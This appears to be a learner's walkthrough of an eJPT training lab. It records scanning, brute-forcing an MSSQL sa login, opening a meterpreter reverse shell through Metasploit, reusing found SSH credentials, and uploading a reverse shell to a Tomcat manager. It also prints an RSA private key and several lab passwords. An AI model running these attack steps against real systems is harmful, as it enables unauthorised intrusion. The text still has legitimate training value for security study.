Info

Scenario
You have been engaged in a Black-box Penetration Test (172.16.64.0/24 range). Your goal is to read the flag file on each machine. On some of them, you will be required to exploit a remote code execution vulnerability in order to read the flag.

Some machines are exploitable instantly but some might require exploiting other ones first. Enumerate every compromised machine to identify valuable information, that will help you proceed further into the environment.

If you are stuck on one of the machines, don't overthink and start pentesting another one.

When you read the flag file, you can be sure that the machine was successfully compromised. But keep your eyes open - apart from the flag, other useful information may be present on the system.

This is not a CTF! The flags' purpose is to help you identify if you fully compromised a machine or not.

The solutions contain the shortest path to compromise each machine. You should follow the penetration testing process covered in its entirety!

Goals
Discover and exploit all the machines on the network.

Read all flag files (one per machine)

What you will learn
How to exploit Apache Tomcat

How to exploit SQL Server

Post-exploitation discovery

Arbitrary file upload exploitation

Recommended tools
Dirb
Metasploit framework (recommended version: 5)
Nmap
Netcat

Approach

First of, I connected to the VPN and started with a NMAP scan of the entire range.

Nmap scan report for 172.16.64.101
Host is up (0.27s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA)
|   256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA)
|_  256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519)
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache2 Ubuntu Default Page: It works
9080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 172.16.64.182
Host is up (0.30s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA)
|   256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA)
|_  256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 172.16.64.199
Host is up (0.24s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: WIN10
|   NetBIOS_Domain_Name: WIN10
|   NetBIOS_Computer_Name: WIN10
|   DNS_Domain_Name: WIN10
|   DNS_Computer_Name: WIN10
|_  Product_Version: 10.0.10586
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-03-02T12:26:47
| Not valid after:  2051-03-02T12:26:47
| MD5:   cc88 5bbb d493 b6ab 7a60 0307 b01e a772
|_SHA-1: 806f 0b01 3ab5 2ba9 c848 aa82 e15d 55b4 106e 6374
|_ssl-date: 2021-03-02T17:35:42+00:00; -2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| ms-sql-info:
|   172.16.64.199:1433:
|     Version:
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| nbstat: NetBIOS name: WIN10, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:8e:48:10 (VMware)
| Names:
|   WIN10<00>            Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WIN10<20>            Flags: <unique><active>
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-03-02T17:35:32
|_  start_date: 2021-03-02T12:26:45

Apache Tomcat host

We can see one box (172.16.64.101) is running some Tomcat stuff. So I started up a gobuster to scan those two ports.

Port 8080

kali@kali:~/ine/eJPT/blackbox1/scans$ gobuster dir -u http://172.16.64.101:8080/ -w /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -o 101_8080
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://172.16.64.101:8080/
[+] Threads:        10
[+] Wordlist:       /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/03/02 12:46:38 Starting gobuster
===============================================================
/manager (Status: 302)
[ERROR] 2021/03/02 12:54:56 [!] parse http://172.16.64.101:8080/error_log: net/url: invalid control character in URL
/host-manager (Status: 302)
===============================================================
2021/03/02 13:09:20 Finished
===============================================================

Port 9080

kali@kali:~/ine/eJPT/blackbox1/scans$ gobuster dir -u http://172.16.64.101:9080 -w /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -o 101_9080
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://172.16.64.101:9080
[+] Threads:        10
[+] Wordlist:       /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/03/02 12:46:10 Starting gobuster
===============================================================
/manager (Status: 302)
[ERROR] 2021/03/02 13:02:18 [!] parse http://172.16.64.101:9080/error_log: net/url: invalid control character in URL
/host-manager (Status: 302)
===============================================================
2021/03/02 13:34:52 Finished
===============================================================

/manager pop up pretty early on in the scan, so I fired up msfconsole and started to bruteforce username/password to be able to get in. Tried both 8080 and 9080 without any luck.

Switched to look at the SQL server host.

Jumped over to the Microsoft SQL (172.16.64.199) box to start bruteforcing user/pass combinations on that since I didn’t get any where with the Tomcat stuff. Still using msfconsole:

msf6 auxiliary(scanner/mssql/mssql_login) > show options

Module options (auxiliary/scanner/mssql/mssql_login):

   Name                 Current Setting                   Required  Description
   ----                 ---------------                   --------  -----------
   BLANK_PASSWORDS      true                              no        Try blank passwords for all users
   BRUTEFORCE_SPEED     5                                 yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS         false                             no        Try each user/password couple stored in the current database
   DB_ALL_PASS          false                             no        Add all passwords in the current database to the list
   DB_ALL_USERS         false                             no        Add all users in the current database to the list
   PASSWORD                                               no        A specific password to authenticate with
   PASS_FILE            /usr/share/wordlists/rockyou.txt  no        File containing passwords, one per line
   Proxies                                                no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS               172.16.64.101                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                1433                              yes       The target port (TCP)
   STOP_ON_SUCCESS      false                             yes       Stop guessing when a credential works for a host
   TDSENCRYPTION        false                             yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                                 yes       The number of concurrent threads (max one per host)
   USERNAME             sa                                no        A specific username to authenticate as
   USERPASS_FILE                                          no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         false                             no        Try the username as the password for all users
   USER_FILE                                              no        File containing usernames, one per line
   USE_WINDOWS_AUTHENT  false                             yes       Use windows authentification (requires DOMAIN option set)
   VERBOSE              true                              yes       Whether to print output for all attempts

msf6 auxiliary(scanner/mssql/mssql_login) > set RHOSTS 172.16.64.199
RHOSTS => 172.16.64.199
msf6 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/mssql/mssql_login) > run

[*] 172.16.64.199:1433    - 172.16.64.199:1433 - MSSQL - Starting authentication scanner.
[!] 172.16.64.199:1433    - No active DB -- Credential data will not be saved!
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:123456 (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:12345 (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:123456789 (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:password (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:iloveyou (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:princess (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:1234567 (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:rockyou (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:12345678 (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:abc123 (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:nicole (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:daniel (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:babygirl (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:monkey (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:lovely (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:jessica (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:654321 (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:michael (Incorrect: )
[-] 172.16.64.199:1433    - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:ashley (Incorrect: )
[+] 172.16.64.199:1433    - 172.16.64.199:1433 - Login Successful: WORKSTATION\sa:qwerty

BOOM! We got a match! Let’s run mssql_enum and see what we have going on here!

msf6 auxiliary(scanner/mssql/mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf6 auxiliary(admin/mssql/mssql_enum) > show options

Module options (auxiliary/admin/mssql/mssql_enum):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

msf6 auxiliary(admin/mssql/mssql_enum) > set RHOSTS 172.16.64.199
RHOSTS => 172.16.64.199
msf6 auxiliary(admin/mssql/mssql_enum) > set PASSWORD qwerty
PASSWORD => qwerty
msf6 auxiliary(admin/mssql/mssql_enum) > run
[*] Running module against 172.16.64.199

[*] 172.16.64.199:1433 - Running MS SQL Server Enumeration...
[*] 172.16.64.199:1433 - Version:
[*]     Microsoft SQL Server 2014 - 12.0.2000.8 (X64)
[*]             Feb 20 2014 20:04:26
[*]             Copyright (c) Microsoft Corporation
[*]             Express Edition (64-bit) on Windows NT 6.3 <X64> (Build 10586: ) (Hypervisor)
[*] 172.16.64.199:1433 - Configuration Parameters:
[*] 172.16.64.199:1433 -        C2 Audit Mode is Not Enabled
[*] 172.16.64.199:1433 -        xp_cmdshell is Enabled
[*] 172.16.64.199:1433 -        remote access is Enabled
[*] 172.16.64.199:1433 -        allow updates is Not Enabled
[*] 172.16.64.199:1433 -        Database Mail XPs is Not Enabled
[*] 172.16.64.199:1433 -        Ole Automation Procedures are Not Enabled
[*] 172.16.64.199:1433 - Databases on the server:
[*] 172.16.64.199:1433 -        Database name:master
[*] 172.16.64.199:1433 -        Database Files for master:
[*] 172.16.64.199:1433 -                C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\master.mdf
[*] 172.16.64.199:1433 -                C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\mastlog.ldf
[*] 172.16.64.199:1433 -        Database name:tempdb
[*] 172.16.64.199:1433 -        Database Files for tempdb:
[*] 172.16.64.199:1433 -                C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\tempdb.mdf
[*] 172.16.64.199:1433 -                C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\templog.ldf
[*] 172.16.64.199:1433 -        Database name:model
[*] 172.16.64.199:1433 -        Database Files for model:
[*] 172.16.64.199:1433 -                C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\model.mdf
[*] 172.16.64.199:1433 -                C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\modellog.ldf
[*] 172.16.64.199:1433 -        Database name:msdb
[*] 172.16.64.199:1433 -        Database Files for msdb:
[*] 172.16.64.199:1433 -                C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\MSDBData.mdf
[*] 172.16.64.199:1433 -                C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\MSDBLog.ldf
[*] 172.16.64.199:1433 - System Logins on this Server:
[*] 172.16.64.199:1433 -        sa
[*] 172.16.64.199:1433 -        ##MS_SQLResourceSigningCertificate##
[*] 172.16.64.199:1433 -        ##MS_SQLReplicationSigningCertificate##
[*] 172.16.64.199:1433 -        ##MS_SQLAuthenticatorCertificate##
[*] 172.16.64.199:1433 -        ##MS_PolicySigningCertificate##
[*] 172.16.64.199:1433 -        ##MS_SmoExtendedSigningCertificate##
[*] 172.16.64.199:1433 -        ##MS_PolicyEventProcessingLogin##
[*] 172.16.64.199:1433 -        ##MS_PolicyTsqlExecutionLogin##
[*] 172.16.64.199:1433 -        ##MS_AgentSigningCertificate##
[*] 172.16.64.199:1433 -        WIN10\AdminELS
[*] 172.16.64.199:1433 -        NT SERVICE\SQLWriter
[*] 172.16.64.199:1433 -        NT SERVICE\Winmgmt
[*] 172.16.64.199:1433 -        NT SERVICE\MSSQL$FOOSQL
[*] 172.16.64.199:1433 -        BUILTIN\Users
[*] 172.16.64.199:1433 -        NT AUTHORITY\SYSTEM
[*] 172.16.64.199:1433 -        fooadmin
[*] 172.16.64.199:1433 -        jerry
[*] 172.16.64.199:1433 - Disabled Accounts:
[*] 172.16.64.199:1433 -        ##MS_PolicyEventProcessingLogin##
[*] 172.16.64.199:1433 -        ##MS_PolicyTsqlExecutionLogin##
[*] 172.16.64.199:1433 - No Accounts Policy is set for:
[*] 172.16.64.199:1433 -        All System Accounts have the Windows Account Policy Applied to them.
[*] 172.16.64.199:1433 - Password Expiration is not checked for:
[*] 172.16.64.199:1433 -        sa
[*] 172.16.64.199:1433 -        ##MS_PolicyEventProcessingLogin##
[*] 172.16.64.199:1433 -        ##MS_PolicyTsqlExecutionLogin##
[*] 172.16.64.199:1433 -        fooadmin
[*] 172.16.64.199:1433 -        jerry
[*] 172.16.64.199:1433 - System Admin Logins on this Server:
[*] 172.16.64.199:1433 -        sa
[*] 172.16.64.199:1433 -        WIN10\AdminELS
[*] 172.16.64.199:1433 -        NT SERVICE\SQLWriter
[*] 172.16.64.199:1433 -        NT SERVICE\Winmgmt
[*] 172.16.64.199:1433 -        NT SERVICE\MSSQL$FOOSQL
[*] 172.16.64.199:1433 -        fooadmin
[*] 172.16.64.199:1433 - Windows Logins on this Server:
[*] 172.16.64.199:1433 -        WIN10\AdminELS
[*] 172.16.64.199:1433 -        NT SERVICE\SQLWriter
[*] 172.16.64.199:1433 -        NT SERVICE\Winmgmt
[*] 172.16.64.199:1433 -        NT SERVICE\MSSQL$FOOSQL
[*] 172.16.64.199:1433 -        NT AUTHORITY\SYSTEM
[*] 172.16.64.199:1433 - Windows Groups that can logins on this Server:
[*] 172.16.64.199:1433 -        BUILTIN\Users
[*] 172.16.64.199:1433 - Accounts with Username and Password being the same:
[*] 172.16.64.199:1433 -        fooadmin
[*] 172.16.64.199:1433 - Accounts with empty password:
[*] 172.16.64.199:1433 -        No Accounts with empty passwords where found.
[*] 172.16.64.199:1433 - Stored Procedures with Public Execute Permission found:
[*] 172.16.64.199:1433 -        sp_replsetsyncstatus
[*] 172.16.64.199:1433 -        sp_replcounters
[*] 172.16.64.199:1433 -        sp_replsendtoqueue
[*] 172.16.64.199:1433 -        sp_resyncexecutesql
[*] 172.16.64.199:1433 -        sp_prepexecrpc
[*] 172.16.64.199:1433 -        sp_repltrans
[*] 172.16.64.199:1433 -        sp_xml_preparedocument
[*] 172.16.64.199:1433 -        xp_qv
[*] 172.16.64.199:1433 -        xp_getnetname
[*] 172.16.64.199:1433 -        sp_releaseschemalock
[*] 172.16.64.199:1433 -        sp_refreshview
[*] 172.16.64.199:1433 -        sp_replcmds
[*] 172.16.64.199:1433 -        sp_unprepare
[*] 172.16.64.199:1433 -        sp_resyncprepare
[*] 172.16.64.199:1433 -        sp_createorphan
[*] 172.16.64.199:1433 -        xp_dirtree
[*] 172.16.64.199:1433 -        sp_replwritetovarbin
[*] 172.16.64.199:1433 -        sp_replsetoriginator
[*] 172.16.64.199:1433 -        sp_xml_removedocument
[*] 172.16.64.199:1433 -        sp_repldone
[*] 172.16.64.199:1433 -        sp_reset_connection
[*] 172.16.64.199:1433 -        xp_fileexist
[*] 172.16.64.199:1433 -        xp_fixeddrives
[*] 172.16.64.199:1433 -        sp_getschemalock
[*] 172.16.64.199:1433 -        sp_prepexec
[*] 172.16.64.199:1433 -        xp_revokelogin
[*] 172.16.64.199:1433 -        sp_resyncuniquetable
[*] 172.16.64.199:1433 -        sp_replflush
[*] 172.16.64.199:1433 -        sp_resyncexecute
[*] 172.16.64.199:1433 -        xp_grantlogin
[*] 172.16.64.199:1433 -        sp_droporphans
[*] 172.16.64.199:1433 -        xp_regread
[*] 172.16.64.199:1433 -        sp_getbindtoken
[*] 172.16.64.199:1433 -        sp_replincrementlsn
[*] 172.16.64.199:1433 - Instances found on this server:
[*] 172.16.64.199:1433 -        FOOSQL
[*] 172.16.64.199:1433 - Default Server Instance SQL Server Service is running under the privilege of:
[*] 172.16.64.199:1433 -        xp_regread might be disabled in this system
[*] Auxiliary module execution completed

Nice nice. Let’s just smash on with meterpreter and get a shell on this box through MSSQL.

msf6 exploit(windows/mssql/mssql_payload) > use exploit/windows/mssql/mssql_payload
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/mssql/mssql_payload) > show options

Module options (exploit/windows/mssql/mssql_payload):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   METHOD               cmd              yes       Which payload delivery method to use (ps, cmd, or old)
   PASSWORD             qwerty           no        The password for the specified username
   RHOSTS               172.16.64.199    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                1433             yes       The target port (TCP)
   SRVHOST              0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT              8080             yes       The local port to listen on.
   SSL                  false            no        Negotiate SSL for incoming connections
   SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   URIPATH                               no        The URI to use for this exploit (default is random)
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.64.12     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/mssql/mssql_payload) > set password qwerty
password => qwerty
msf6 exploit(windows/mssql/mssql_payload) > set RHOSTS 172.16.64.199
RHOSTS => 172.16.64.199
msf6 exploit(windows/mssql/mssql_payload) > set LHOST 172.16.64.12
LHOST => 172.16.64.12
msf6 exploit(windows/mssql/mssql_payload) > run

[*] Started reverse TCP handler on 172.16.64.12:4444
[*] 172.16.64.199:1433 - Command Stager progress -   1.47% done (1499/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress -   2.93% done (2998/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress -   4.40% done (4497/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress -   5.86% done (5996/102246 bytes)
.........
.........
[*] 172.16.64.199:1433 - Command Stager progress -  95.29% done (97435/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress -  96.76% done (98934/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress -  98.19% done (100400/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress -  99.59% done (101827/102246 bytes)
[*] Sending stage (175174 bytes) to 172.16.64.199
[*] 172.16.64.199:1433 - Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 2 opened (172.16.64.12:4444 -> 172.16.64.199:49673) at 2021-03-02 14:07:13 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

So we own this box now! ✅

We find other useful file on the Desktop as well.

meterpreter > cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAlGWzjgKVHcpaDFvc6877t6ZT2ArQa+OiFteRLCc6TpxJ/lQFEDtmxjTcotik7V3DcYrIv3UsmNLjxKpEJpwqELGBfArKAbzjWXZE0VubmBQMHt4WmBMlDWGcKu8356blxom+KR5S5o+7CpcL5R7UzwdIaHYt/ChDwOJc5VK7QU46G+T9W8aYZtvbOzl2OzWj1U6NSXZ4Je/trAKoLHisVfq1hAnulUg0HMQrPCMddW5CmTzuEAwd8RqNRUizqsgIcJwAyQ8uPZn5CXKWbE/p1p3fzAjUXBbjB0c7SmXzondjmMPcamjjTTB7kcyIQ/3BQfBya1qhjXeimpmiNX1nnQ== rsa-key-20190313###ssh://developer:dF3334slKw@172.16.64.182:22#############################################################################################################################################################################################meterpreter >

Username and password! developer:dF3334slKw@172.16.64.182:22

SSH onto 183 host

Let’s try out the username and password we found in the SQL Server Box!

kali@kali:~/ine/eJPT/blackbox1$ ssh developer@172.16.64.182
The authenticity of host '172.16.64.182 (172.16.64.182)' can't be established.
ECDSA key fingerprint is SHA256:RENtJS0acPn+bv2Lw6K0XrHov6tFifkbIXQ3kh/NpeE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.16.64.182' (ECDSA) to the list of known hosts.
developer@172.16.64.182's password:

Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-104-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

195 packages can be updated.
10 updates are security updates.

Last login: Sun May 19 05:36:41 2019 from 172.16.64.13
developer@xubuntu:~$

We’re in! Let’s kick of linpeas here, while we see more on the Tomcat host!

Back to Tomcat

Towards the end /host-manager pop up in gobuster. Using this we try to bruteforce user/pass combos again, to see if we can get in here instead.

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set TARGETURI /host-manager/html
TARGETURI => /host-manager/html
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run

Nothing new happended here :/ Maybe it’s just a rabbit hole, and we should get in through creds from the other servers?

Linpeas on .183 is done!

Nothing really intrested that I know about showed up here. There is a id_rsa file here tho, that might work on the Tomcat machine?

developer@xubuntu:~/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAqb8XF/KwvqtPHptin3NbRwwtWznripQn5WNVKcNqJVnk5rN6
uVF5pwdaFhn1pnx4oFdLnDSEAqmQ36xe54q01iuXqH4bkJ10bZyH9kt87ZxTSFs0
/cigSrCOodtCDpRkiCZJQ7t4e67K/54w0LZHFywYVB3GstWBORW3dzcncSRB0VJx
izhgbCZTRydbo8fl+ZaJQP9BdQ/0lNCU2RSXJiLHUa9IDeoBulGwh2tNtM/FM+r3
+CXYS6L6Q1030EYVn7kcMU0Et4gAEDMwCC9i6YPBIKajUKah+uUC/e3GklS7pRSd
2zgX+sPw16zHxPZ6SiqrNMZdmYNvkuO+4Dj/YQIDAQABAoIBAHfd1+nyV/scr69W
XMtqQ2+lWrYL7ZebTZz/ixkFxIQBudFrtmL89OINIAFxbXWWefwICP2SXBIhOYup
hg8NdOu0NtEl1ENH3Pq2SZCT9/E2rdzvgzkfHon/qYkEct4mzeMS3jO1Q7xbT0A4
rhIEVak4WymzKSgJ+smb20WVLgYHRPGStkdTp0s4J1qdKxoIK47wzqT/LqDdrBQU
CawEQvqXnRrtx+fSskov2vTe78Rv2nOndsSYBXfzXi5NbQ67BqUgkvgPa+vOTMj/
dnqEHCkf+SZ9+A3fvGozPtcs6ViL9hN0db464CX7RYtt3jLb4XltqY6dH21pFSm8
UCxYol0CgYEA1Vg9NuBWgxtQENE/NiqwhRgSBcwZB6S1NW5y4kgDDIH/lmsMN6b3
eSj29LYQ6EoQDNh/YmTRDNupllHr5NT+B/rCimkwDpFMuOfwqHYN4AzTcaz5u98j
6HApQas25e43tN61uE2dTPdlMHJqTXasOliVh678LRB3V2FuvYiDft8CgYEAy69V
eYpLrSQk5m/irsMoqWDaxWUrEGA7QVVfm3opibfaxak5m/q2I1sEHMzsPv9b9nJ/
s1uRUmNaEQ2NHmhhzoFOCR+3SiKoKPa6XAO8rRyUJxRFJMHb+JkGCilpKQU4WAs4
atW3swz/mTMmzKKXmk6pxZ79Aj+6S2lyKZfIib8CgYEAvt6v/Y2duLRR4InkXMi6
noiXbzpXVmBEguYqwEme+KzBhsiE6LFnjK1arDrLS5cfXu6+oMADy9Ymlkb6ngL0
txzgucY76XyTQIa5522fIkk3TudrkmqjjIv0TT0p43JJwnbR6279AWQA0uQ6OM2o
bpbcSMUD9ilaLAIOemFNC88CgYAQzsce4GqePv1Mhq8N/My+LV/gKhkDoO1C1uis
y8fhtWo4JV67oFSnVjtgpQhZqnjMPWaMRmIXiltETPn4KGTpxYHK/vMBCxsVRkba
kPRg1JrlHqcWAWlFelslO4WR/PxJR6PALSKbg9cTrUTmXgRkl1krFZOLO/cDghAJ
npzNwQKBgQDNsrGuSDftdys8ytN9WaFL6/ga+lhrS+b3XuCL1jTEH5xsuy42cDPF
ehCvg8gxZ0HTR7aCeFtNAwgvDSeWuKPf9MFKrAVtI8CI4g8fbTceO/QAAOFpLirK
69FAPKHvshjhqn74SB3ymCOV1/NouX72q0B96o5v5IocDI1SWN/aaw==
-----END RSA PRIVATE KEY-----
developer@xubuntu:~/.ssh$ 

There is an extra box on this network!

NMAP didn’t catch all of the boxes on this network.
There is a host 172.16.64.140 as well, which listens on port 80.
Nothing intresting directly on that address, but running gobuster on it we find a directory called /project which has some kinda site on it.
Might be some SQL injection perhaps? Since there is a search and newsletter signup?

Doing multiple gobuster sessions, we finally end up where there is some interesting files located.
http://172.16.64.140/project/backup/test/

There is a file here with some DB credentials, that we actually should have used on the SQL Server, but we bruteforced the SA password here instead.
sdadas.txt

Driver={SQL Server};Server=foosql.foo.com;Database=;Uid=fooadmin;Pwd=fooadmin;
/var/www/html/project/354253425234234/flag.txt

As we see from the file above, there is also a mention about a flag file: http://172.16.64.140/project/354253425234234/flag.txt.

Congratulations, you exploited this machine!
Now continue to others.

Taking a look at Tomcat again after getting a hint

From the “solution” part, we see that tomcat:s3cret should be the username and password we should use. We’ve already tried this, but it also say that if we don’t get in with these the account is mostlikely locked out since we tried to bruteforce it… Kinda bad tho, in a real world scenario this account would have been locked, we can’t just call up the guys owning the server and ask them to unlock it like the suggestion basically is here (we’re resetting the box).

This is the last box we gotta pwn, so we reset it all.

Using exploit/multi/http/tomcat_mgr_upload in metasploit, with the .101 ip. port 8080, and the username and password tomcat/s3cret we can upload a reverese shell and get the box within seconds. Didn’t bother to enumerate the box. Got two flags from developer and elmsadmin-something… The objective is probably to get root on it tho…